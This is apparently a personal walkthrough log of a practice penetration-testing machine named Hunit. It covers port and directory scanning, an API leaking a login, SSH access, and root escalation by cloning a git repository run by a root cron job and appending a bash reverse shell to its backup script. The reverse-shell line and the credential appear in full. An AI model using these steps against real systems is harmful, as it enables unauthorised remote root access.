Hunit
๐งช Pentest Log: {{date:2025-08-13}}
๐ Target Information
- Machine Name: Hunit
- IP Address: 192.168.199.125
- Operating System: Linux
ip=192.168.199.125
๐ก Enumeration
๐ Port Scanning
Command Used
ports=$(nmap -p- --min-rate=1000 -T4 $ip | grep '^[0-9]' | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//)
nmap -p$ports -sC -sV $ip -oN tcp_scan_result.txt
nmap -sU --top-ports 100 $ip -oN udp_scan_result.txt
Port 8080
Web Directory Scan
gobuster dir -u http://$ip -w /usr/share/seclists/Discovery/Web-Content/common.txt
dirsearch -u http://$ip -r -o dirsearch.txt
curl -s http://192.168.199.125:8080/article/the-taste-of-rain
Found /api/, visit http://192.168.199.125:8080/api/, found /user/
http://192.168.199.125:8080/api/user/
Found admin credenial
dademola:ExplainSlowQuest110
Port 12445
Port 18030
Web Directory Scan
gobuster dir -u http://$ip -w /usr/share/seclists/Discovery/Web-Content/common.txt
dirsearch -u http://$ip -r -o dirsearch.txt
Port 43022
๐ฃ Exploitation
๐ Vulnerability Summary
- Service / Port: 22
- Vulnerability Type: N/A
๐ Exploit Execution
๐ง Exploit Method
Tool / Script Used:
ssh dademola@$ip -p 43022
๐งฌ Privilege Escalation
๐ค Current Access
- User: dademola
- Groups: 1001(dademola)
- Shell Type: ssh
๐ Enumeration
Scheuled Tasks:
./pspy64
Found
2025/08/19 01:12:01 CMD: UID=0 PID=994 | /bin/bash /root/git-server/backups.sh
Obtain git id_rsa under git home directory
๐ Privilege Escalation Exploit
๐ Exploit Summary
- Technique Used: N/A
- Target Binary/Service: N/A
- Reference / Source: N/A
๐ง Exploit Steps
- Setup
GIT_SSH_COMMAND='ssh -i id_rsa -p 43022' git clone git@$ip:/git-server
cd git-server
echo "sh -i >& /dev/tcp/192.168.45.163/8080 0>&1" >> backups.sh
chmod +x backup.sh
git add -A
git commit -m "pwn"
nc -lvnp 8080
- Smash to root
GIT_SSH_COMMAND='ssh -i ../id_rsa -p 43022' git push origin master